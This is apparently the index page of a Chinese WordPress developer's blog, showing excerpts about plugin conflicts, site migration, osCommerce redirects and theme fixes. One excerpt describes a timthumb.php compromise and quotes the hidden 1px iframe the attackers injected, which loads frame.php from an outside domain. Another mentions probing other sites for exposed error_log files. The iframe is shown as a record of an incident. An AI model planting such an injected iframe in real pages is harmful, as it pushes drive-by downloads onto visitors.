Sola主要做WordPress相关的项目,过程中会遇到许多问题,喜欢随手记录以下,这个笔记也是我的WP成长笔记。
wordpress主题中一个很常用的处理图片的工具timthumb.php因为远程存储文件时候的验证上不足而产生了漏洞,允许在cache文件夹中执行一些php脚本,这已经不是什么秘密,可我就是中了招。 某天打开网站,发现服务器上所有的wordpress网站在firefox中都会打开一个弹出窗口,提示下载frame.php,这应该不是代码本意,不知道我的firefox出了啥问题,其实是在源代码里多了隐藏的iframe,用firebug查看源代码,可以看到下面的内容
<iframe id="iframe" src="%20http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px;">
继续阅读timthumb漏洞导致iframe攻击,wp-settings.php被修改今天折腾的WP网站装了个收费的ecommerce插件,叫WP eStore,说实话感觉这个插件并不比免费的强大多少,还是很多人买。按照移植WordPress的方法折腾完,看起来很不错一切都没问题,访问到Store页面的时候,问题来了,eStore的shortcode报错,说指定的id不存在咋回事。
继续阅读WP eStore移植后数据全部丢失最近将wordpress升级到3.2.1版本,相应插件全部升级,我一直很喜欢用ckeditor for wordpress这个插件取代wordpress默认的插件,没想到全部更新后这个插件却和主题发生了冲突。
继续阅读新版ckeditor for wordpress插件与导致woo themes的主题选项无法使用今天心血来潮访问了下error_log,惊奇的发现自己博客的error_log从web就被轻松访问了,随即翻了翻别人的网站,在各个域名后面加error_log。有的提示404错误,有的提示无权访问error_log,有的就和我的差不多把主机信息都透露了。。。
继续阅读wordpress禁止从web访问error_log
WordPress模板制作中,function.php是一个特殊的文件,可以用来自定义模板中需要用到的函数,添加钩子函数等。为了为不同的模板添加不同的钩子函数,需要使用WordPress的条件标签(Conditional Tag)。
继续阅读[wordpress]在function.php中使用条件标签一例Jquery Autocomplete Plugin 可以用来自动填写表单,类似google suggest,可以给用户更好的体验。
你可以先查看实例。
例如,很多表单要求我们填写国家,如果是下拉列表,我们需要从长长的一个列表中选择自己的国家,为了不看的眼花缭乱,我们会用键盘的导航键快速选择,例如要选择中国我们可以选中下拉列表按键盘的“C”键,找到以c开头的国家再找到China。这样还是不够简单迅速。那么来看看下面这个输入式国家选择器,是不是会方便很多。
用户不需要从长长的列表中选择国家了,只需要键入国家的英文名称开头几个字母,这个选择器就会自动提供可供选择的项目,类似google suggest,帮助用户轻轻松松完成国家的选择。
另外,用户完成选择后可以定义一个回调函数,实现更多的功能。例如,选择国家后显示该国家的货币和汇率,或者显示某些房地产信息之类的。可以做的应用很多。
该功能主要依靠JQuery的Autocomplete插件来完成。
[download id=”10″]
继续阅读jquery autocomplete实例:国家选择器最近发现一个主题网站叫mapgress.com,主题功能很不错,无论是前台外观还是后台功能都不输给收费主题,应客户的要求拿来三个主题开始做定制化。开始做的时候就发现了,这个网站主题的footer代码不可以更改!无论是删除全部链接,还是添加自己的链接都不行!
继续阅读移除Magpress主题的footer链接看wordpress免费主题安全性cufon字体可以让我们在网页上使用自定义的字体,实现和图片一样的效果。cufon字体的使用可以参考文章Cufon-网页设计师必备字体效果。
通常情况下,cufon只支持使用简单的标签,你不能使用一些级联选择器,例如#menu ul li等等。经过测试发现,firefox和chrome都支持这种选择方式,但IE不支持。最简单的方法就是引入一个选择器引擎来帮助我们实现这个功能,例如jQuery,这样js引用情况如下:
继续阅读cufon字体IE浏览器兼容性问题
Wordpress默认的编辑器不是很好用,我习惯将它替换成CKEditor,安装CKEditor For WordPress即可。安装后编辑器将被替换,评论框的编辑器默认会被替换成CKEditor,有时候会导致模板样式错乱,可以在CKEditor->Basic Settings中禁用。
CKEditor默认的smiley表情不适合中国,我们可以将表情改造一下换成自己喜欢的表情,方法如下。
继续阅读Wordpress CKEditor smiley表情图标定制化Oscomerce登陆后应该跳转到哪里可以分两种情况,
1. 购物车没有商品,跳转到首页或者查看账户页面。
2. 购物车有商品,跳转到购物车页面或者到checkout页面。
代码可以在网店根目录的login.php中修改,打开该文件,找到
tep_redirect(tep_href_link(FILENAME_DEFAULT));
修改为
if ($cart->count_contents() < 1) {
tep_redirect(tep_href_link('account.php'));
} else {
tep_redirect(tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL'));
}
代码含义如下
tep_redirect(tep_href_link('account.php')); – 跳转到账户页面,如果要跳转到首页,改为
tep_redirect(tep_href_link(FILENAME_DEFAULT))
tep_redirect(tep_href_link(FILENAME_CHECKOUT_SHIPPING, '', 'SSL')); – 跳转到结账页面,如果要挑战到购物车页面,改为
tep_redirect(tep_href_link(FILENAME_SHOPPING_CART, '', 'SSL'))
继续阅读oscommerce 登陆后跳转的问题
1. wp featured content slider 插件简单介绍
wp featured content slider是一款wordpress的幻灯片(slideshow)插件,你可以在post的编辑页面将post指定为featured post,这样它就可以在featured content slider中显示。该插件的特色是图片(post中的图片或通过custom field定义的图片)显示在banner右侧,post文字内容显示在左侧,是名副其实的content slider。另外该插件提供功能选项,使你可以自由切换幻灯片效果、切换速度、背景色。幻灯片带有箭头是导航按钮。效果图如下
Wordpress Shopp插件使用了wordpress的一个页面来动态输出网店内容,默认的Title带着SHOP这个词,感觉很多余,所以要想办法去掉。
去掉的方法就是在模板的functions.php文件中添加钩子函数修改Title输出,因为其它的SEO插件可以覆盖掉PAGE Title的格式,所以要保证Wordpress Shopp使用的页面title规则不被其它SEO插件控制。
修改方法如下,打开functions.php,在最后添加如下代码
继续阅读wordpress Shopp Title优化
移植wordpress+w-e-commerce的网站要注意wp-e-commerce的路径,在移植wordpress时,我们一般会做两件事:
1.导入文件,修改文件夹权限,修改配置文件等等。
2. 将保存好的数据库用记事本打开,搜索原来的域名,假设是在本地,我们会搜索类似"localhost/wordpress"并替换为目标地址域名www.mydomain.com。
如果我们忽略了搜索绝对地址,可能问题就要出现了。对于wp-e-commerce需要获取上传地址,如果地址不存在,就会发生缩略图不显示的情况,并且后台显示报错信息
The following directories are not writable:
继续阅读wp-e-commerce后台缩略图不显示wp-e-commerce(Version 3.7.6.9)有个很奇怪的问题,使用[productsall]列出所有产品条目,会出现很多重复记录,有的重复两次,有的重复四五次。在论坛找解决方法,有人提出将重复产品复制一次,再删除原来的产品,就可以解决。但重复产品太多了,这样做很慢,而且这不是治本的方法。于是我决定找到问题的症结所在。
继续阅读wp-e-commerce重复产品(duplicated pruducts) bugWordpress是一款强大的个人博客程序,具有极高的扩展性,众多免费插件可供使用。今天用wordpress搭建了一个新博客,简单记录一下搭建的过程。
配合详细注解的图片一步步教你打造自己的WordPress博客
主机:国外共享主机,不用备案